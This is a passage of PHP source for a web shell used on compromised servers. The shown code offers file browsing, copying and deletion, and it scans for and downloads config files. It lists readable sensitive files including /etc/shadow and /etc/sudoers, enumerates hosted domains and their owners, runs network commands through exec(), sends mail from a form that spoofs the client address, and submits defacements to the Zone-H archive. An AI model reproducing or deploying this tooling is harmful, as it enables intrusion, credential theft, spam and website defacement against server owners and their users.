} else echo "zip_entry_open($zip,$zip_entry) error<br>";
}
}
zip_close($zip);
}
}
// +--------------------------------------------------
// | Data Formating
// +--------------------------------------------------
function html_encode($str){
global $charSet;
$str = preg_replace(array('/&/', '/</', '/>/', '/"/'), array('&', '<', '>', '"'), $str); // Bypass PHP to allow any charset!!
$str = htmlentities($str, ENT_QUOTES, $charSet, false);
return $str;
}
//echo rep(5,3); 33333
function rep($x,$y){
if ($x) {
$aux = "";
for ($a=1;$a<=$x;$a++) $aux .= $y;
return $aux;
} else return "";
}
//echo str_zero("123123","2");
function str_zero($arg1,$arg2){
if (strstr($arg1,"-") == false){
$aux = intval($arg2) - strlen($arg1);
if ($aux)
return rep($aux,"0").$arg1;
else
return $arg1;
} else {
return "[$arg1]";
}
}
//echo replace_double("123", "123123"); 123
function replace_double($sub,$str){
$out=str_replace($sub.$sub,$sub,$str);
while ( strlen($out) != strlen($str) ){
$str=$out;
$out=str_replace($sub.$sub,$sub,$str);
}
return $out;
}
//echo remove_special_chars("test�������444"); testAAAAAAC444
function remove_special_chars($str){
$str = trim($str);
$str = strtr($str,"��������������������������������������������������������������!@#%&*()[]{}+=?",
"YuAAAAAAACEEEEIIIIDNOOOOOOUUUUYsaaaaaaaceeeeiiiionoooooouuuuyy_______________");
$str = str_replace("..","",str_replace("/","",str_replace("\\","",str_replace("\$","",$str))));
return $str;
}
//echo format_path("c:\\test\\test.php"); C:/test/test.php/
function format_path($str){
global $islinux;
$str = trim($str);
$str = str_replace("..","",str_replace("\\","/",str_replace("\$","",$str)));
$done = false;
while (!$done) {
$str2 = str_replace("//","/",$str);
if (strlen($str) == strlen($str2)) $done = true;
else $str = $str2;
}
$tam = strlen($str);
if ($tam){
$last_char = $tam - 1;
if ($str[$last_char] != "/") $str .= "/";
if (!$islinux) $str = ucfirst($str);
}
return $str;
}
function array_csort() {
$args = func_get_args();
$marray = array_shift($args);
$msortline = "return(array_multisort(";
foreach ($args as $arg) {
$i++;
if (is_string($arg)) {
foreach ($marray as $row) {
$sortarr[$i][] = $row[$arg];
}
} else {
$sortarr[$i] = $arg;
}
$msortline .= "\$sortarr[".$i."],";
}
$msortline .= "\$marray));";
eval($msortline);
return $marray;
}
//echo show_perms(octdec("2755")); urwxr
function show_perms( $P ) {
$sP = "";
if($P & 0x1000) $sP .= 'p'; // FIFO pipe
elseif($P & 0x2000) $sP .= 'c'; // Character special
elseif($P & 0x4000) $sP .= 'd'; // Directory
elseif($P & 0x6000) $sP .= 'b'; // Block special
elseif($P & 0x8000) $sP .= '−'; // Regular
elseif($P & 0xA000) $sP .= 'l'; // Symbolic Link
elseif($P & 0xC000) $sP .= 's'; // Socket
else $sP .= 'u'; // UNKNOWN
// owner - group - others
$sP .= (($P & 0x0100) ? 'r' : '−') . (($P & 0x0080) ? 'w' : '−') . (($P & 0x0040) ? (($P & 0x0800) ? 's' : 'x' ) : (($P & 0x0800) ? 'S' : '−'));
$sP .= (($P & 0x0020) ? 'r' : '−') . (($P & 0x0010) ? 'w' : '−') . (($P & 0x0008) ? (($P & 0x0400) ? 's' : 'x' ) : (($P & 0x0400) ? 'S' : '−'));
$sP .= (($P & 0x0004) ? 'r' : '−') . (($P & 0x0002) ? 'w' : '−') . (($P & 0x0001) ? (($P & 0x0200) ? 't' : 'x' ) : (($P & 0x0200) ? 'T' : '−'));
return $sP;
}
//echo format_size(100000000); 95.37 Mb
function format_size($arg) {
if ($arg>0){
$j = 0;
$ext = array(" bytes"," Kb"," Mb"," Gb"," Tb");
while ($arg >= pow(1024,$j)) ++$j;
return round($arg / pow(1024,$j-1) * 100) / 100 . $ext[$j-1];
} else return "0 bytes";
}
// echo get_size("test.zip"); 3.82 Kb
function get_size($file) {
return format_size(filesize($file));
}
function check_limit($new_filesize=0) {
global $fm_current_root;
global $quota_mb;
if($quota_mb){
$total = total_size($fm_current_root);
if (floor(($total+$new_filesize)/(1024*1024)) > $quota_mb) return true;
}
return false;
}
function get_user($arg) {
global $mat_passwd;
$aux = "x:".trim($arg).":";
for($x=0;$x<count($mat_passwd);$x++){
if (strstr($mat_passwd[$x],$aux)){
$mat = explode(":",$mat_passwd[$x]);
return $mat[0];
}
}
return $arg;
}
function get_group($arg) {
global $mat_group;
$aux = "x:".trim($arg).":";
for($x=0;$x<count($mat_group);$x++){
if (strstr($mat_group[$x],$aux)){
$mat = explode(":",$mat_group[$x]);
return $mat[0];
}
}
return $arg;
}
//echo uppercase("test"); TEST
function uppercase($str){
global $charset;
return mb_strtoupper($str, $charset);
}
//echo lowercase("tESt"); test
function lowercase($str){
global $charset;
return mb_strtolower($str, $charset);
}
function n()
{
return "<br>";
}
function banner()
{
global $ip;
echo "[ System : ".php_uname() . "] <br>";
echo "[ Server : " . $_SERVER['SERVER_SOFTWARE'] ."] <br>" ;
// Check for safe mode
if( ini_get('safe_mode') ){
echo ' [Safe mode = on] ' ;
}else{
echo ' [Safe mode = off (unsafe)] ';
}
echo " [ User: " . get_current_user() ." ] ";
echo " [Server: " . (isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:"") . "] ";
echo " [Client: ". $ip ."]";
//print_r($_SERVER);
//print_r($_SERVER);
}
function compressFolder($rootPath)
{
chdir($_SESSION['current_dir']);
// $rootPath = realpath();
if($rootPath[strlen($rootPath)-1] === '/' or $rootPath[strlen($rootPath)-1] === '\\')
$rootPath = substr($rootPath,0,strlen($rootPath)-1);
//echo $rootPath;
// Initialize archive object
$zip = new ZipArchive();
$zip->open($rootPath.".zip", ZipArchive::CREATE | ZipArchive::OVERWRITE);
// Create recursive directory iterator
/** @var SplFileInfo[] $files */
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator( $rootPath),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($files as $name => $file)
{
// Skip directories (they would be added automatically)
if (!$file->isDir())
{
// Get real and relative path for current file
$filePath = $file->getRealPath();
$relativePath = substr($filePath, strlen($rootPath) + 1);
// Add current file to archive
//$zip->addFile($filePath, $relativePath);
$zip->addFile($filePath, $name);
}
}
// Zip archive will be created only after closing object
$zip->close();
return $rootPath.".zip";
}
function compressFileFolder($files)
{
chdir($_SESSION['current_dir']);
// = array('New folder (3)', '404 shell.php', 'asim.html');
$zipname = 'downloadCompressed.zip';
$zip = new ZipArchive;
$zip->open($zipname, ZipArchive::CREATE | ZipArchive::OVERWRITE);
foreach ($files as $file) {
if(!is_dir($file))
{
$zip->addFile($file);
}
else
{
$rootPath=$file;
$FolderFiles = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator( $rootPath),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($FolderFiles as $name => $FolderFile)
{
// Skip directories (they would be added automatically)
if (!$FolderFile->isDir())
{
// Get real and relative path for current file
$filePath = $FolderFile->getRealPath();
//$relativePath = substr($filePath, strlen($rootPath) + 1);
// Add current file to archive
//$zip->addFile($filePath, $relativePath);
$zip->addFile($filePath, $rootPath.'\\'.$name);
}
}
}
}
$zip->close();
return $zipname;
}
function displayChangePassword()
{
global $rpath;
?>
<div class="bodyDiv">
<form method="post" >
<table id='db' >
<tr><td >Old Username:</td>
<td id="db"> <input type="Text" name="oldusername" id="dbusername"></td></tr>
<tr><td >Old Password: </td><td id="db">
<input type="Text" name="oldpassword" id="dbpassword"></td></tr>
<tr><td >New Username:</td><td id="db">
<input type="Text" name="newusername" id="dbusername"></td></tr>
<tr><td >New Password: </td><td id="db">
<input type="Text" name="newpassword" id="dbpassword"></td></tr>
<tr><td > </td><td ><input type="submit" value="Chang Password" name="submit"></td></tr>
</table>
</form>
</div>
<?php
}
function processChangePassword()
{
global $oldusername,$oldpassword,$newusername,$newpassword;
$pattern1 = "/\\\$u = \"".$oldusername."\";/";
$pattern2 = "/\\\$p = \"".md5($oldpassword)."\";/";
$pattern3 = "\$u = \"".$newusername."\";";
$pattern4 = "\$p = \"".md5($newpassword)."\";";
$data = file_get_contents($_SERVER['SCRIPT_FILENAME']);
if(preg_match($pattern1,$data)===1 and preg_match($pattern2,$data)===1)
{
//$pattern1 = "if(\$username===\"".$newusername."\" and md5(\$password)==='".md5($newpassword)."')";
$result1 = preg_replace($pattern1,$pattern3,$data);
$result2 = preg_replace($pattern2,$pattern4,$result1);
file_put_contents($_SERVER['SCRIPT_FILENAME'],$result2);
echo "<div class='bodydiv'>Username and Password Changed Successfully</div>";
}
else
echo "<div class='bodydiv'>Wrong Username:Password</div>";
}
function displayHeaders()
{
echo "<div class='bodydiv'>";
foreach (getallheaders() as $name => $value) {
echo "$name: $value<br>";
}
echo "</div>";
}
function findConfig()
{
global $rpath;
chdir($_SESSION['current_dir']);
$filenames = array("config.php","conf_global.php","Settings.php",
"configuration.php","settings.php","configure.php"
);
// Create recursive directory iterator
/** @var SplFileInfo[] $files */
$files = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator( getcwd()),
RecursiveIteratorIterator::LEAVES_ONLY
);
foreach ($files as $name => $file)
{
$filePath = $file->getRealPath();
foreach ($filenames as $filename)
{
if (!$file->isDir() and strpos($name,$filename)!==false)
{
echo "<a href='{$rpath}?vf={$filePath}&dlfile=1'>".$filePath . "</a><br>";
}
}
}
echo "<br>----------------------More Config Found-------------------<br>";
foreach ($files as $name => $file)
{
$filePath = $file->getRealPath();
if (!$file->isDir() and strpos($name,"config")!==false)
{
echo "<a href='{$rpath}?vf={$filePath}&dlfile=1'>".$filePath . "</a><br>";
}
}
}
function displayCommands()
{
global $rpath,$islinux;
?>
<div class='bodydiv'>
<div id="menu">
<a class="menu" href="<?php echo $rpath?>?command=1">Netstat</a>
<a class="menu" href="<?php echo $rpath?>?command=2">Ipconfig</a>
<a class="menu" href="<?php echo $rpath?>?command=3">Route</a>
</div><pre>
<textarea rows="25" readonly>
<?php
if(isset($_SESSION['command']))
{
if($_SESSION['command']==1)
{
if($islinux)
{
exec("netstat -ntulp",$mat,$rtrn);
}
else{
exec("netstat -ano",$mat,$rtrn);
}
echo implode("\n",$mat);;
}
else if($_SESSION['command']==2)
{
if($islinux)
{
exec("ifconfig",$mat,$rtrn);
}
else{
exec("ipconfig /all",$mat,$rtrn);
}
echo implode("\n",$mat);;
}
else if($_SESSION['command']==3)
{
if($islinux)
{
exec("route",$mat,$rtrn);
}
else{
exec("route print -4",$mat,$rtrn);
}
echo implode("\n",$mat);;
}
}
echo "</textarea></pre></div>";
}
function displayHash()
{
global $rpath,$hpass,$hsalt;
if(!isset($hpass))
{
$hpass="admin";
}
?>
<div class="bodyDiv">
<form method="post" >
Password: <input name='hpass' > Salt: <input name='hsalt' > <input type='submit' value='hash'>
</form>
</div>
<?php
echo "<div class='bodyDiv'>";
echo "Password : ".$hpass."<br>";
echo "MD5 : " . md5($hpass) . "<br>";
$wp_hasher = new PasswordHash(8, TRUE);
echo "Wordpress : " . $wp_hasher->HashPassword('123') . "<br>";
echo "<div>";
}
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;
function PasswordHash($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
$this->random_state = microtime() . uniqid(rand(), TRUE); // removed getmypid() for compatibility reasons
}
function get_random_bytes($count)
{
$output = '';
if ( @is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .=
pack('H*', md5($this->random_state));
}
$output = substr($output, 0, $count);
}
return $output;
}
function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) == $output)
$output = '*1';
$id = substr($setting, 0, 3);
# We use "$P$", phpBB3 uses "$H$" for the same thing
if ($id != '$P$' && $id != '$H$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) != 8)
return $output;
# We're kind of forced to use MD5 here since it's the only
# cryptographic primitive available in all versions of PHP
# currently in use. To implement our own low-level crypto
# in PHP would result in much worse performance and
# consequently in lower iteration counts and hashes that are
# quicker to crack (by non-PHP code).
if (PHP_VERSION >= '5') {
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
} else {
$hash = pack('H*', md5($salt . $password));
do {
$hash = pack('H*', md5($hash . $password));
} while (--$count);
}
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
function gensalt_extended($input)
{
$count_log2 = min($this->iteration_count_log2 + 8, 24);
# This should be odd to not reveal weak DES keys, and the
# maximum valid value is (2**24 - 1) which is odd anyway.
$count = (1 << $count_log2) - 1;
$output = '_';
$output .= $this->itoa64[$count & 0x3f];
$output .= $this->itoa64[($count >> 6) & 0x3f];
$output .= $this->itoa64[($count >> 12) & 0x3f];
$output .= $this->itoa64[($count >> 18) & 0x3f];
$output .= $this->encode64($input, 3);
return $output;
}
function gensalt_blowfish($input)
{
# This one needs to use a different order of characters and a
# different encoding scheme from the one in encode64() above.
# We care because the last character in our encoded string will
# only represent 2 bits. While two known implementations of
# bcrypt will happily accept and correct a salt string which
# has the 4 unused bits set to non-zero, we do not want to take
# chances and we also do not want to waste an additional byte
# of entropy.
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '$';
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
function HashPassword($password)
{
if ( strlen( $password ) > 4096 ) {
return '*';
}
$random = '';
if (CRYPT_BLOWFISH == 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) == 60)
return $hash;
}
if (CRYPT_EXT_DES == 1 && !$this->portable_hashes) {
if (strlen($random) < 3)
$random = $this->get_random_bytes(3);
$hash =
crypt($password, $this->gensalt_extended($random));
if (strlen($hash) == 20)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) == 34)
return $hash;
# Returning '*' on error is safe here, but would _not_ be safe
# in a crypt(3)-like function used _both_ for generating new
# hashes and for validating passwords against existing hashes.
return '*';
}
function CheckPassword($password, $stored_hash)
{
if ( strlen( $password ) > 4096 ) {
return false;
}
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] == '*')
$hash = crypt($password, $stored_hash);
return $hash === $stored_hash;
}
}
class SimpleMail
{
protected $_wrap = 78;
protected $_to = array();
protected $_subject;
protected $_message;
protected $_headers = array();
protected $_params;
protected $_attachments = array();
protected $_uid;
public function __construct()
{
$this->reset();
}
public function reset()
{
$this->_to = array();
$this->_headers = array();
$this->_subject = null;
$this->_message = null;
$this->_wrap = 78;
$this->_params = null;
$this->_attachments = array();
$this->_uid = $this->getUniqueId();
return $this;
}
public function setTo($email, $name)
{
$this->_to[] = $this->formatHeader((string) $email, (string) $name);
return $this;
}
public function getTo()
{
return $this->_to;
}
public function setSubject($subject)
{
$this->_subject = $this->encodeUtf8(
$this->filterOther((string) $subject)
);
return $this;
}
public function getSubject()
{
return $this->_subject;
}
public function setMessage($message)
{
$this->_message = str_replace("\n.", "\n..", (string) $message);
return $this;
}
public function getMessage()
{
return $this->_message;
}
public function addAttachment($path, $filename = null)
{
$filename = empty($filename) ? basename($path) : $filename;
$this->_attachments[] = array(
'path' => $path,
'file' => $filename,
'data' => $this->getAttachmentData($path)
);
return $this;
}
public function getAttachmentData($path)
{
$filesize = filesize($path);
$handle = fopen($path, "r");
$attachment = fread($handle, $filesize);
fclose($handle);
return chunk_split(base64_encode($attachment));
}
public function setFrom($email, $name)
{
$this->addMailHeader('From', (string) $email, (string) $name);
return $this;
}
public function addMailHeader($header, $email = null, $name = null)
{
$address = $this->formatHeader((string) $email, (string) $name);
$this->_headers[] = sprintf('%s: %s', (string) $header, $address);
return $this;
}
public function addGenericHeader($header, $value)
{
$this->_headers[] = sprintf(
'%s: %s',
(string) $header,
(string) $value
);
return $this;
}
public function getHeaders()
{
return $this->_headers;
}
public function setParameters($additionalParameters)
{
$this->_params = (string) $additionalParameters;
return $this;
}
public function getParameters()
{
return $this->_params;
}
public function setWrap($wrap = 78)
{
$wrap = (int) $wrap;
if ($wrap < 1) {
$wrap = 78;
}
$this->_wrap = $wrap;
return $this;
}
public function getWrap()
{
return $this->_wrap;
}
public function hasAttachments()
{
return !empty($this->_attachments);
}
public function assembleAttachmentHeaders()
{
$head = array();
$head[] = "MIME-Version: 1.0";
$head[] = "Content-Type: multipart/mixed; boundary=\"{$this->_uid}\"";
return join(PHP_EOL, $head);
}
public function assembleAttachmentBody()
{
$body = array();
$body[] = "This is a multi-part message in MIME format.";
$body[] = "--{$this->_uid}";
$body[] = "Content-type:text/html; charset=\"utf-8\"";
$body[] = "Content-Transfer-Encoding: 7bit";
$body[] = "";
$body[] = $this->_message;
$body[] = "";
$body[] = "--{$this->_uid}";
foreach ($this->_attachments as $attachment) {
$body[] = $this->getAttachmentMimeTemplate($attachment);
}
return implode(PHP_EOL, $body);
}
public function getAttachmentMimeTemplate($attachment)
{
$file = $attachment['file'];
$data = $attachment['data'];
$head = array();
$head[] = "Content-Type: application/octet-stream; name=\"{$file}\"";
$head[] = "Content-Transfer-Encoding: base64";
$head[] = "Content-Disposition: attachment; filename=\"{$file}\"";
$head[] = "";
$head[] = $data;
$head[] = "";
$head[] = "--{$this->_uid}";
return implode(PHP_EOL, $head);
}
public function send()
{
$to = $this->getToForSend();
$headers = $this->getHeadersForSend();
if (empty($to)) {
throw new RuntimeException(
'Unable to send, no To address has been set.'
);
}
if ($this->hasAttachments()) {
$message = $this->assembleAttachmentBody();
$headers .= PHP_EOL . $this->assembleAttachmentHeaders();
} else {
$message = $this->getWrapMessage();
}
return mail($to, $this->_subject, $message, $headers, $this->_params);
}
public function debug()
{
return '<pre>' . print_r($this, true) . '</pre>';
}
public function __toString()
{
return print_r($this, true);
}
public function formatHeader($email, $name = null)
{
$email = $this->filterEmail($email);
if (empty($name)) {
return $email;
}
$name = $this->encodeUtf8($this->filterName($name));
return sprintf('"%s" <%s>', $name, $email);
}
public function encodeUtf8($value)
{
$value = trim($value);
if (preg_match('/(\s)/', $value)) {
return $this->encodeUtf8Words($value);
}
return $this->encodeUtf8Word($value);
}
public function encodeUtf8Word($value)
{
return sprintf('=?UTF-8?B?%s?=', base64_encode($value));
}
public function encodeUtf8Words($value)
{
$words = explode(' ', $value);
$encoded = array();
foreach ($words as $word) {
$encoded[] = $this->encodeUtf8Word($word);
}
return join($this->encodeUtf8Word(' '), $encoded);
}
public function filterEmail($email)
{
$rule = array(
"\r" => '',
"\n" => '',
"\t" => '',
'"' => '',
',' => '',
'<' => '',
'>' => ''
);
$email = strtr($email, $rule);
$email = filter_var($email, FILTER_SANITIZE_EMAIL);
return $email;
}
public function filterName($name)
{
$rule = array(
"\r" => '',
"\n" => '',
"\t" => '',
'"' => "'",
'<' => '[',
'>' => ']',
);
$filtered = filter_var(
$name,
FILTER_SANITIZE_STRING,
FILTER_FLAG_NO_ENCODE_QUOTES
);
return trim(strtr($filtered, $rule));
}
public function filterOther($data)
{
return filter_var($data, FILTER_UNSAFE_RAW, FILTER_FLAG_STRIP_LOW);
}
public function getHeadersForSend()
{
if (empty($this->_headers)) {
return '';
}
return join(PHP_EOL, $this->_headers);
}
public function getToForSend()
{
if (empty($this->_to)) {
return '';
}
return join(', ', $this->_to);
}
public function getUniqueId()
{
return md5(uniqid(time()));
}
public function getWrapMessage()
{
return wordwrap($this->_message, $this->_wrap);
}
}
function processPaste()
{
global $islinux;
if( isset($_SESSION['lastAction']) and $_SESSION['lastAction']=='Copy')
{
foreach ($_SESSION['Copy'] as $item)
{
if($islinux)
{
total_copy($_SESSION['CopyPath'] . "/" . $item ,$_SESSION['current_dir'] . "/" . $item);
}
else
total_copy($_SESSION['CopyPath'] . "\\" . $item ,$_SESSION['current_dir'] . "\\" . $item);
}
$_SESSION['lastAction']="";
}
else if( isset($_SESSION['lastAction']) and $_SESSION['lastAction']=='Cut')
{
foreach ($_SESSION['Cut'] as $item)
{
if($islinux)
{
total_copy($_SESSION['CutPath'] . "/" . $item ,$_SESSION['current_dir'] . "/" . $item);
total_delete($_SESSION['CutPath'] . "/" . $item);
}
else
{
total_copy($_SESSION['CutPath'] . "\\" . $item ,$_SESSION['current_dir'] . "\\" . $item);
total_delete($_SESSION['CutPath'] . "\\" . $item);
}
}
$_SESSION['lastAction']="";
}
}
function processDelete()
{
global $islinux;
foreach ($_POST['fileItem'] as $item){
if($islinux)
{
total_delete($_SESSION['current_dir'] . "/" . $item);
}
else
total_delete($_SESSION['current_dir'] . "\\" . $item);
}
}
function sendEmails()
{
global $to,$from,$replyto,$cc,$subject,$message,$attachment;
$mail = new SimpleMail();
$tos = explode(",",$to);
foreach ($tos as $i)
{
$mail->setTo($i, '');
}
$mail->setSubject($subject);
$mail->setFrom($from, '');
$mail->addMailHeader('Reply-To', $replyto, '');
$ccs = explode(",",$cc);
foreach ($ccs as $a)
{
$mail->addMailHeader('Cc', $a, '');
}
//$mail->addMailHeader('Bcc', 'steve@example.com', 'Steve Jobs');
$mail->addGenericHeader('X-PHP-Script', '');
$mail->addGenericHeader('X-Mailer', 'PHP/' . phpversion());
$mail->addGenericHeader('Content-Type', 'text/html; charset="utf-8"');
$mail->setMessage($message);
if($attachment!="")
{
$ats = explode(",",$attachment);
foreach ($ats as $a)
{
// echo "inside attachment<br>";
$mail->addAttachment($a);
}
}
$mail->setWrap(100);
$oldphpself = $_SERVER['PHP_SELF'];
$oldremoteaddr = $_SERVER['REMOTE_ADDR'];
$_SERVER['PHP_SELF']="";
$_SERVER['REMOTE_ADDR'] = $_SERVER['SERVER_ADDR'];
$send = $mail->send();
$_SERVER['PHP_SELF']=$oldphpself;
$_SERVER['REMOTE_ADDR']=$oldremoteaddr;
echo ($send) ? 'Email sent successfully' : 'Could not send email';
return "";
}
function displayMailer()
{
global $sendemail;
?>
<div class='bodyDiv'>
<form method="post">
<table id="db">
<td>
<tr><td>To:</td><td><input type="text" name="to"><td></tr>
<tr><td>From:</td><td><input type="text" name="from"><td></tr>
<tr><td>Cc: </td><td><input type="text" name="cc"><td></tr>
<tr><td>Bcc: </td><td><input type="text" name="bcc"><td></tr>
<tr><td>Reply-To: </td><td><input type="text" name="replyto"><td></tr>
<tr><td>Subject: </td><td><input type="text" name="subject"><td></tr>
<tr><td>Message: </td><td><td></tr>
<tr><td colspan="2"><textarea name="message" rows="25" ></textarea><td></tr>
<tr><td >Attachment: </td><td><input type="text" name="attachment"><td></tr>
<tr><td></td><td><input type="submit" name="sendemail" value="send"><td></tr>
</table>
</form></div>
<?php
if(isset($sendemail))
{
echo "<div class='bodyDiv'>";
echo sendEmails();
echo "</div>";
}
}
function displayInfo()
{
global $islinux;
$res="<div class='bodyDiv'><table>";
$res .= "<tr><td>php</td><td>".phpversion()."</td></tr>";
$access = array("python"=>"python -V",
"perl"=>"perl -e \"print \$]\"",
"python"=>"python -V",
"ruby"=>"ruby -v",
"node"=>"node -v",
"nodejs"=>"nodejs -v",
"gcc"=>"gcc -dumpversion",
"java"=>"java -version",
"javac"=>"javac -version"
);
foreach($access as $k=>$v){
exec($v, $version);
//$version = execute($v);
//$version = explode("\n", $version);
if(isset($version[0]) and $version[0]) $version = $version[0];
else $version = "?";
$res .= "<tr><td>".$k."</td><td>".$version."</td></tr>";
}
if($islinux){
$interesting = array(
"/etc/os-release", "/etc/passwd", "/etc/shadow", "/etc/group", "/etc/issue", "/etc/issue.net", "/etc/motd", "/etc/sudoers", "/etc/hosts", "/etc/aliases",
"/proc/version", "/etc/resolv.conf", "/etc/sysctl.conf",
"/etc/named.conf", "/etc/network/interfaces", "/etc/squid/squid.conf", "/usr/local/squid/etc/squid.conf",
"/etc/ssh/sshd_config",
"/etc/httpd/conf/httpd.conf", "/usr/local/apache2/conf/httpd.conf", " /etc/apache2/apache2.conf", "/etc/apache2/httpd.conf", "/usr/pkg/etc/httpd/httpd.conf", "/usr/local/etc/apache22/httpd.conf", "/usr/local/etc/apache2/httpd.conf", "/var/www/conf/httpd.conf", "/etc/apache2/httpd2.conf", "/etc/httpd/httpd.conf",
"/etc/lighttpd/lighttpd.conf", "/etc/nginx/nginx.conf",
"/etc/fstab", "/etc/mtab", "/etc/crontab", "/etc/inittab", "/etc/modules.conf", "/etc/modules");
foreach($interesting as $f){
if(@is_file($f) && @is_readable($f)) $res .= "<tr><td><a href='".$rpath."?vf=".$f."'>".$f."</a></td><td>".$f." is readable</a></td></tr>";
}
}
echo $res;
echo "</div>";
}
function displayDomains()
{
$f = "/etc/named.conf";
echo "<div class='bodyDiv'>";
if(@is_readable($f))
{
$file = @implode(@file("/etc/named.conf"));
if (!$file) {
die("# Can't Read [/etc/named.conf]");
}
preg_match_all("#named/(.*?).db#", $file, $r);
$domains = array_unique($r[1]);
{
echo "Domains Found: " . count($domains) . "<br>";
echo "<table ><tr><td>Domain</td><td>User</td></tr>";
foreach ($domains as $domain) {
$user = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
echo "<tr><td>$domain</td><td>" . $user['name'] . "</td></tr>";
}
echo "</table>";
}
}
else
echo $f . " not readable!";
echo "</div>";
}
function ZoneH($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
function displayZoneH()
{
global $defacer, $hackmode, $reason,$sites;
if(isset($defacer) and isset($hackmode) and isset($reason) and isset($sites))
{
echo "<div class='bodyDiv'>";
$i = 0;
$sites = explode("\n", $sites);
echo "<pre class=ml1 style='margin-top:5px'>";
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http")
{
$sites[$i] = "http://".trim($sites[$i]);
}
ZoneH("http://zone-h.org/notify/single", $defacer, $hackmode, $reason, $sites[$i]);
echo "<font class=txt size=3>Site : ".$sites[$i] ." Posted !</font><br>";
++$i;
}
echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
echo "</div>";
}
?>
<div class='bodydiv'>
<form method="post" action="">
Notifier
<input type="text" name="defacer" value="Attacker"/><br>
Websites:<br>
<textarea rows=15 name='sites'></textarea>
<select name="hackmode">
<option value="">--------SELECT--------</option>
<option value="1" >known vulnerability (i.e. unpatched system)</option>
<option value="2" >undisclosed (new) vulnerability</option>
<option value="3" >configuration / admin. mistake</option>
<option value="4" >brute force attack</option>
<option value="5" >social engineering</option>
<option value="6" >Web Server intrusion</option>
<option value="7" >Web Server external module intrusion</option>
<option value="8" >Mail Server intrusion</option>
<option value="9" >FTP Server intrusion</option>
<option value="10" >SSH Server intrusion</option>
<option value="11" >Telnet Server intrusion</option>
<option value="12" >RPC Server intrusion</option>
<option value="13" >Shares misconfiguration</option>
<option value="14" >Other Server intrusion</option>
<option value="15" >SQL Injection</option>
<option value="16" >URL Poisoning</option>
<option value="17" >File Inclusion</option>
<option value="18" >Other Web Application bug</option>
<option value="19" >Remote administrative panel access through bruteforcing</option>
<option value="20" >Remote administrative panel access through password guessing</option>
<option value="21" >Remote administrative panel access through social engineering</option>
<option value="22" >Attack against the administrator/user (password stealing/sniffing)</option>
<option value="23" >Access credentials through Man In the Middle attack</option>
<option value="24" >Remote service password guessing</option>
<option value="25" >Remote service password bruteforce</option>
<option value="26" >Rerouting after attacking the Firewall</option>
<option value="27" >Rerouting after attacking the Router</option>
<option value="28" >DNS attack through social engineering</option>
<option value="29" >DNS attack through cache poisoning</option>
<option value="30" >Not available</option>
<option value="31" >Cross-Site Scripting</option>
</select>
<select name="reason">
<option value="">--------SELECT--------</option>
<option value="1" >Heh...just for fun!</option>
<option value="2" >Revenge against that website</option>
<option value="3" >Political reasons</option>
